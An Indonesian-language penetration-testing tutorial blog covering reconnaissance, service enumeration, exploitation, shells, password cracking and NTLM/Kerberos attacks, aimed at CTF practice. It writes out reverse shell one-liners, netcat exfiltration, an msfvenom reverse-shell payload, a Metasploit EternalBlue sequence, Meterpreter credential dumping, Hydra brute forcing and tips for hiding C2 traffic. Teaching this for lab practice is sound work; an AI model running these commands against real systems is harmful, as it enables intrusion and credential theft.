Goals utama adalah menguasai tools, metodologi, dan konsep dasar yang dipakai untuk Pentesting di dunia nyata - khususnya cara mendapatkan initial access dan foothold pada sebuah mesin, baik Windows maupun Linux. Melalui Fase reconnaissance, exploit development, sampai memahami NTLM & Kerberos.
Blog ini mencangkup :
- Menggunakan basic hacking tools untuk reconnaissance dan enumeration.
- Membedakan cara gaining a foothold pada mesin Windows vs Linux.
- Melakukan password cracking dan bekerja dengan hashes.
- Memahami teori NTLM & Kerberos.
- Menjalankan vulnerability scanning.
Reconnaissance (information gathering) adalah langkah pertama. Ada dua jenis:
- Passive Reconnaissance: mengumpulkan info publik tanpa menyentuh target langsung (WHOIS, sosial media, DNS records, metadata dokumen).
- Active Reconnaissance: berinteraksi langsung dengan sistem target (port scanning, DNS queries, service & user enumeration). Lebih akurat, tapi berisiko terdeteksi.
DNS Enumeration
Mengungkap hostnames, IP dan subdomains (yang sering membocorkan staging environments, admin panel, dll). Pahami juga konsep VHOSTS, ASN, dan DNS Zone Transfer (AXFR) yang bisa menjadi "blue print" jaringan target.
# DNS query dasar Purpose: Basic DNS querying tool to query specific DNS record types (e.g., A, MX, TXT). For finding: Subdomains, new domains, IP addresses & IT infrastructure assets nslookup -type=TXT example.com Purpose: Perform detailed DNS lookups and trace DNS paths. For finding: Subdomains, new domains, IP addresses & IT infrastructure assets dig example.com ANY Purpose: Basic DNS querying tool to query specific DNS record types (e.g., A, MX, TXT). For finding: Subdomains, new domains, IP addresses & IT infrastructure assets host -t TXT example.com # Otomatisasi enumerasi subdomain & zone transfer Purpose: Automates DNS enumeration for subdomains and records. For finding: Subdomains, new domains, IP addresses, Zone transfers & IT infrastructure assets dnsenum example.com Purpose: DNS reconnaissance focused on subdomain enumeration and detecting DNS misconfigurations. For finding: Subdomains, new domains, IP addresses & IT infrastructure assets fierce --domain example.com Purpose: DNS reconnaissance focused on subdomain enumeration with build-in lists and fast results on the CLI. URL: https://github.com/blark/aiodnsbrute For finding: Subdomains, new domains aiodnsbrute example.com Purpose: Comprehensive tool for passive and active DNS enumeration. For finding: Enumerate subdomains using multiple sources, including brute-forcing. amass enum -d example.com # Brute-force VHOST dengan Gobuster / ffuf gobuster vhost --wordlist namelist.txt --url example.com gobuster vhost --useragent "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" --wordlist "/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt" --url example.com ffuf -H "Host: FUZZ.example.com" -w namelist.txt -u example.com ffuf -H "Host: FUZZ.example.com" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" -c -w "/usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt" -u example.com
Wordlist : https://github.com/theMiddleBlue/DNSenum/blob/master/wordlist/subdomains-top1mil-20000.txt
Port & Service Enumeration - Nmap
Ports adalah endpoint layanan (0–65535). Membuka port berarti menemukan layanan yang bisa menjadi pintu masuk. Nmap adalah tool utama.
| Argument | Fungsi |
|---|---|
-sS | SYN scan / half-open (default saat sudo, lebih stealthy) |
-sT | CONNECT scan (full 3-way handshake, menyatu dengan trafik normal) |
-sU | Scan port UDP |
-sV / -sC | Deteksi versi (banner) / jalankan default NSE scripts |
-p- | Scan semua 65535 port |
-Pn | Lewati ping (host yang blokir ICMP) |
-oA | Output ke semua format |
# Scan paling sering dipakai (SYN + version + script + all ports) sudo nmap -sC -sV -p- 192.168.1.1 -oA hasil-scan sudo nmap -sV -sC -p- -v 192.168.1.1 nmap -p <port> --script=<service>* Nmap alternatives Test-NetConnection -Port 445 192.168.1.1 or 1..1024 | % {echo ((New-ObjectNet.Sockets.TcpClient).Connect("192.168.1.1", $_)) "TCP port $_ is open"} 2>$null
Port penting yang wajib hafal:
- 21 : FTP
- 22 : SSH
- 25 : SMTP
- 88 : Kerberos
- 161 / 162 : SNMP
- 139/445 : SMB
- 443/80 : HTTPS/HTTP
- 389/636 : LDAP(S)
- 3389 : RDP
- 3306 : MySQL
- 5900 : VNC
nmap --script=smb-* 192.168.1.1. Alternatif lebih cepat: MASSCAN & RustScan (tapi lebih berisik).
Rustscan
# RustScan paling sering dipakai
sudo rustscan -u 5000 -b 1900 -t 4000 --tries 2 --scan-order serial -a 192.168.1.1 -- -A -sVC --script=safe,default,discovery,version,vuln
sudo rustscan -u 5000 -b 1900 -t 4000 --tries 2 --scan-order serial -a 192.168.1.1 -- -A -sVC --script=safe,default,discovery,version,vuln | sudo tee rustscan-full-result-192.168.1.1
NetCat - "TCP/IP Swiss Army Knife"
NetCat paling sering dipakai # Port scan nc -nvv -w 1 -z 192.168.1.1 3388-3390 # Transfer file (exfiltration) nc -l -p 8888 > file.txt # penerima nc -q 5 10.10.10.10 8888 < data.txt # pengirim # Listener untuk reverse shell nc -lnvp 8888 Uploading & Downloading Files: Receiving Side / Listening Side: nc -l -p 8888 > file.txt Sending Side: nc -q 5 10.10.10.10 8888 < data.txt
Enumeration per Protokol
| Protokol | Tools & catatan |
|---|---|
| RPC (135,593,445,111) | rpcclient -> enumdomusers, querydominfo, netshareenumall. Sering rentan RCE / auth bypass. |
| NetBIOS (137–139) | nbtscan, nbtstat -A, responder (MITM untuk capture credentials). Sering tanpa enkripsi. |
| SMB (445) | smbmap, smbclient, smbget, dan NetExec (ex-CrackMapExec). Cek SMB signing, null session, dan versi (SMB1 = bahaya, cth EternalBlue). |
| FTP (21) | Cek anonymous login, plaintext creds. Brute-force pakai hydra / medusa. Ingat mode ASCII vs Binary. |
| SNMP (161/162 UDP) | snmpwalk, snmpcheck, onesixtyone. Sering pakai community string default: public (RO) / private (RW). |
| SMTP (25/465/587) | smtp-user-enum (VRFY), swaks, telnet manual. Uji open relay & enumerasi user. |
| SSH / SFTP (22) | hydra, banner grab, cek weak cipher / key. SFTP = subsystem SSH (bukan FTP). |
| Telnet (23) | Telnet manual, hydra. Plaintext total -> umum di IoT / legacy device. |
| DNS (53) | dig axfr, dnsrecon, fierce, dnsenum. Zone transfer (AXFR) bocor full internal hostmap. |
| DHCP (67/68 UDP) | Starvation attack, rogue DHCP server untuk MITM. |
| TFTP (69 UDP) | tftp, atftp. Tanpa auth, plaintext. Sering nyimpen config router/switch. |
| HTTP (80/8080/8000) | nikto, ffuf / gobuster / feroxbuster, whatweb, wpscan, Burp Suite. Cek robots.txt, default panel, LFI/RFI/SQLi. |
| Kerberos (88) | kerbrute, GetNPUsers (AS-REP roast), GetUserSPNs (Kerberoast). Userenum tanpa lockout. |
| POP3 (110/995) | hydra, telnet manual (USER/PASS). 110 = plaintext, 995 = POP3S. |
| rpcbind (111 Unix) | rpcinfo -p, showmount. Enum NFS / NIS (beda dari EPM Windows). |
| NTP (123 UDP) | ntpq, mode 6/7. monlist untuk amplification & recon. |
| IMAP (143/993) | hydra, telnet manual. 143 = plaintext, 993 = IMAPS. |
| LDAP / LDAPS / GC (389/636/3268/3269) | ldapsearch -x, windapsearch, nxc ldap, BloodHound. Anonymous bind untuk dump user/group/GPO. |
| HTTPS (443/8443) | Semua tool HTTP + sslscan, testssl.sh, nmap --script ssl-*. Cek Heartbleed, weak cipher, cert SAN bocor. |
| IPMI (623 UDP) | nmap ipmi-*. Cipher-zero auth bypass, BMC hash dump. |
| rsync (873) | rsync --list-only. Modul unauth = file read/write. |
| MSSQL (1433/1434 UDP) | impacket-mssqlclient, nxc mssql. Cek xp_cmdshell, linked server. 1434 UDP = SQL Browser. |
| Oracle TNS (1521) | odat. SID brute, TNS poisoning, default creds. |
| RADIUS (1812/1813 UDP) | nmap. Cek weak shared secret. |
| NFS (2049 + 111) | showmount -e, mount manual. Cek no_root_squash untuk privesc via SUID. |
| Docker API (2375/2376) | docker -H. 2375 unauth = container escape untuk host RCE. |
| MySQL (3306) | mysql, hydra. Default creds, UDF RCE. |
| RDP (3389) | xfreerdp, rdp_check, nxc rdp. BlueKeep (CVE-2019-0708), NLA bypass, password spray. |
| SIP (5060/5061) | svmap, sipvicious. Ext/user enum, brute-force. |
| PostgreSQL (5432) | psql. Default creds, COPY TO PROGRAM RCE. |
| VNC (5900–5906) | vncviewer. Cek no-auth / weak password. |
| WinRM (5985/5986) | evil-winrm, nxc winrm. Creds valid = shell langsung. |
| Redis (6379) | redis-cli. Unauth by default = write SSH key / webshell = RCE. |
| Kubernetes API / kubelet (6443/10250) | kubectl, curl kubelet. 10250 unauth untuk exec ke pod. |
| Elasticsearch (9200) | curl _cat/indices. Unauth data dump. |
| Memcached (11211) | memcached-tool. Unauth, amplification recon. |
| MongoDB (27017) | mongo. Unauth by default untuk enum + dump. |
LOLBins (Living Off the Land Binaries)
Binary sah bawaan OS yang disalahgunakan attacker (sudah ter-sign vendor → sulit dideteksi AV). Contoh: certutil.exe, mshta.exe, schtasks.exe, wmic.exe. Referensi: LOLBAS (Windows) & GTFOBins (Linux).
Exploit vs Payload
- Exploit = metode pengiriman yang memanfaatkan vulnerability (cth buffer overflow, SQLi, RCE). Vuln yang belum ada patch-nya = zero-day; yang sudah dikenal biasanya dapat nomor CVE.
- Payload = kode yang dieksekusi setelah exploit berhasil (bagian "jahat"-nya), cth reverse/bind shell, Meterpreter.
Mencari Exploit
Butuh 2 info: nama & versi software/hardware. Sumber: Exploit-DB, PacketStorm, GitHub (Google Dorks: "exploit" + "POC" + CVE).
searchsploit apache 2.4 # cari lewat CLI (offline) searchsploit -m 12345 # download exploit # Catatan: di exploit-db, cari CVE tanpa prefix "CVE-"
Payload: Staged vs Non-Staged
| Staged | Non-Staged | |
|---|---|---|
| Cara kirim | Bertahap (stage 1 kecil menarik payload utama) | Sekaligus (utuh) |
| Kelebihan | Ukuran awal kecil, hindari deteksi | Sederhana & andal |
| Kekurangan | Butuh koneksi stabil | Lebih besar, lebih mudah terdeteksi |
Bind Shell vs Reverse Shell
- Bind shell: koneksi diinisiasi dari attacker ke target.
- Reverse shell: koneksi diinisiasi dari target ke attacker (lebih umum, sering lolos firewall outbound).
Listener menerima koneksi shell: NetCat/SoCat untuk TCP shell biasa; Metasploit Multi-Handler untuk Meterpreter.
# Reverse shell one-liners bash -i >& /dev/tcp/192.168.1.1/8888 0>&1 python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("192.168.1.1",8888));[os.dup2(s.fileno(),f) for f in(0,1,2)];pty.spawn("sh")' # Generator: revshells.com & PayloadsAllTheThings
MSFVenom - Generator Payload
| Arg | Fungsi |
|---|---|
-p | Payload |
-f | Format output (exe, ps1, raw...) |
-e / -i | Encoder / jumlah iterasi (obfuscation) |
-b | Bad characters |
| LHOST/LPORT | Host & port listener |
# Windows x64 reverse shell -> exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.1 LPORT=5555 -f exe > shell.exe
Interactive vs Non-Interactive Shell
Shell hasil exploit sering "dump/limited" (tanpa PATH, tab completion, job control). Upgrade ke semi-interactive:
# Upgrade shell python3 -c 'import pty; pty.spawn("/bin/bash")' # lalu: CTRL+Z -> stty raw -echo -> fg -> reset stty rows 15 columns 78 # Alternatif: rlwrap nc -lnvp 8888
Metasploit adalah C2 framework + tool enumerasi & eksploitasi (1600+ exploit, 500+ payload; dikelola Rapid7). Gunakan database (PostgreSQL) agar hasil tersimpan & ter-index.
# Alur dasar search <exploit> use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.1 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.1.5 exploit # Kelola sesi sessions # lihat sesi aktif sessions -i 1 # masuk sesi 1
Meterpreter - Payload Post-Exploitation
Lebih kuat dari reverse shell biasa: platform-independent, komunikasi terenkripsi, modul persistence & privilege escalation.
getsystem # otomatis coba escalate ke SYSTEM migrate <PID> # pindah ke proses stabil (cth svchost.exe) load kiwi # muat Mimikatz (butuh SYSTEM) creds_all # dump credentials shell # buka CLI penuh upload / download # transfer file
getsystem gagal, sesi berisiko crash dan reverse shell hilang. migrate hanya bisa ke proses dengan integrity yang sama atau lebih rendah.
Menyembunyikan C2
- Domain fronting: sembunyikan trafik C2 di balik domain tepercaya (Azure CDN, Cloudflare Workers).
- GEO-fencing: blokir trafik dari lokasi di luar area operasi.
- Traffic shaping: tiru pola trafik normal (HTTP/S, user-agent wajar, ukuran & timing menyerupai app umum).
- Access control: mTLS / pre-shared key, batasi IP yang boleh terhubung.
Initial Access vs Foothold
- Initial Access: akses pertama (sering one-time, berisik/mudah terdeteksi - phishing, exploit, default creds).
- Foothold: akses yang stabil & reliable sebagai basis untuk persistence, privilege escalation, dan lateral movement (lebih stealthy).
Menemukan Host di Jaringan Internal
# Pingsweep /24 - Linux for i in {1..254}; do (ping -c 1 192.168.1.$i | grep "bytes from" &); done # Jika ICMP diblok firewall, pakai Nmap NoPing nmap -Pn -sP 192.168.0.0/16
| Windows Attack Surface | Linux Attack Surface |
|---|---|
|
SMB - EternalBlue (MS17-010), lateral movement RDP - brute-force, vuln versi lama IIS - web server salah konfigurasi NTLM relay - signing/encryption lemah Weak password policy di Active Directory |
SSH - brute-force, reused/default keys SUDO misconfig → privesc SUID binary writable → root Kernel - Dirty Pipe / Dirty COW NFS / Samba tidak aman |
Hash & Salt (recap)
Hash = fungsi satu arah yang mengubah input jadi string ukuran tetap (tidak bisa di-reverse). Salt = data acak yang ditambahkan sebelum di-hash, mencegah rainbow table & memastikan password sama menghasilkan hash berbeda.
| Algoritma | Catatan |
|---|---|
| MD5 | Cepat, tidak aman (rawan collision) |
| SHA-1 | Lebih baik dari MD5 tapi usang |
| SHA-256/512 | Aman & umum dipakai |
| Bcrypt | Lambat (by design) → tahan brute-force |
Teknik Serangan
- Brute Force - coba semua kombinasi (efektif ≤ 8 karakter).
- Dictionary Attack - pakai wordlist (cth
rockyou.txt, SecLists). - Rainbow Table - cocokkan hash ke tabel precomputed.
- Hybrid - gabungan dictionary + brute-force.
- Mask Attack - berdasarkan pola/mask yang diketahui.
Offline Cracking - Hashcat & John
# Cek dulu apakah hash sudah pernah dipecahkan: crackstation.net / ntlm.pw # Identifikasi tipe hash: hash-identifier / hashes.com # Dictionary attack (Bcrypt, mode -m 3200) hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt john --format=bcrypt --wordlist=rockyou.txt hash.txt # Linux /etc/shadow -> gabung dulu dengan unshadow unshadow passwd.txt shadow.txt > passwords.txt john --wordlist=rockyou.txt passwords.txt # Mask attack (6 huruf kecil + 4 digit) hashcat -m 3200 hash.txt ?l?l?l?l?l?l?d?d?d?d # Rules -> "golden rule" best64 hashcat -m 3200 hash.txt rockyou.txt -r best64.rule
.kdbx) & private SSH key (id_rsa). Ekstrak hash dengan keepass2john / ssh2john lalu crack.
Online Attack - Hydra & Password Spraying
# Brute-force SSH hydra -l jarno -P rockyou.txt ssh://192.168.1.1 # Password spraying: 1 password ke banyak user hydra -L users.txt -p "Password123" ssh://192.168.1.1 # Multi-protokol (SMB/RDP/SSH/WinRM): NetExec / GoMapExec / ADSuit
Alur Ringkas
- Punya Password → login & username spraying.
- Punya Username → password spraying & brute-force.
- Punya Hash → crack, atau Pass-the-Hash.
NTLM
Suite protokol autentikasi Microsoft berbasis challenge-response (pakai hash, bukan plaintext). Sudah usang tapi masih jadi fallback di banyak lingkungan. Evolusi: LM (lemah, DES) → NTLMv1 (NT Hash) → NTLMv2 (HMAC-MD5, anti-replay).
NTLM Hash vs NET-NTLM Hash
| NTLM Hash | NET-NTLM Hash | |
|---|---|---|
| Sifat | Tersimpan (SAM/memory) | Dinamis, dibuat saat autentikasi jaringan |
| Diambil dengan | Mimikatz, Metasploit | Responder, Inveigh |
| Dipakai untuk | Pass-the-Hash, offline crack | Relay attack (ntlmrelayx) - tidak bisa PtH |
Serangan NTLM umum: Pass-the-Hash (PTH), Relay Attack, Offline Cracking, dan Responder (racuni LLMNR/NBT-NS agar client kirim hash ke server jahat).
# Mode Hashcat untuk berbagai NTLM hashcat -m 1000 hashes.txt rockyou.txt # NTLM hashcat -m 5500 hashes.txt rockyou.txt # Net-NTLMv1 hashcat -m 5600 hashes.txt rockyou.txt # Net-NTLMv2
Kerberos
Protokol autentikasi jaringan (MIT, era 1980-an) - mutual authentication berbasis symmetric key & sistem ticket. Inti dari autentikasi domain Active Directory. Lebih aman dari NTLM.
Komponen inti: KDC (Key Distribution Center) yang berisi AS (Authentication Server) & TGS (Ticket Granting Server). Akun krbtgt menandatangani semua TGT - akun paling kritikal.
| Aspek | TGT (Ticket Granting Ticket) | TGS (Service Ticket) |
|---|---|---|
| Guna | Bukti identitas untuk minta service ticket | Bukti otorisasi ke satu service spesifik |
| Dienkripsi oleh | Hash password akun KRBTGT | Secret key service tujuan |
| Masa berlaku | Panjang (±8–10 jam) | Pendek (beberapa menit) |
Serangan Kerberos umum:
- Pass-the-Ticket (PtT): pakai ticket curian untuk impersonasi.
- Kerberoasting: ekstrak service ticket lalu crack offline.
- Golden Ticket: forge TGT dengan key KDC (krbtgt) yang dikompromikan.
- Silver Ticket: forge service ticket untuk aplikasi tertentu.
- Overpass-the-Hash: pakai NTLM hash untuk minta Kerberos ticket.
Proses meninjau sistem secara sistematis (otomatis/semi-otomatis) untuk menemukan kelemahan yang sudah diketahui. Berguna untuk deteksi dini, kepatuhan (PCI-DSS, HIPAA), dan prioritas patching.
Jenis & Tools
| Jenis Scan | Tools umum |
|---|---|
| Network-based | Nessus, OpenVAS, QualysGuard |
| Host-based | Nessus (butuh akses lokal) |
| Web application | Burp Suite, OWASP ZAP, Nikto, Nuclei, WPScan (WordPress) |
| Database | Cek konfigurasi default & permission tidak aman |
Prioritas & Best Practice
- Prioritaskan berdasarkan: severity/CVSS, ketersediaan exploit aktif, dampak bisnis, & effort remediasi.
- Scope jelas: jangan scan aset yang tak disetujui; hindari scan infrastruktur kritikal di jam kerja.
- Terjadwal: mingguan/bulanan atau setelah perubahan besar; integrasikan ke CI/CD.
- Validasi: tinjau manual temuan kritikal.
https://127.0.0.1:8834.
Final Checklist
Untuk memantapkan materi sebelum naik ke level berikutnya:
- Latihan CTF: mesin easy–medium di HackTheBox, VulnLab, TryHackMe. Untuk fokus foothold (bukan web-exploitation), coba: Lame, Legacy, Optimum, Bashed, Tabby.
- Ulang materi & praktikkan setiap tool di demo environment.
- Riset tambahan: artikel/video yang memperdalam fundamental offensive security.
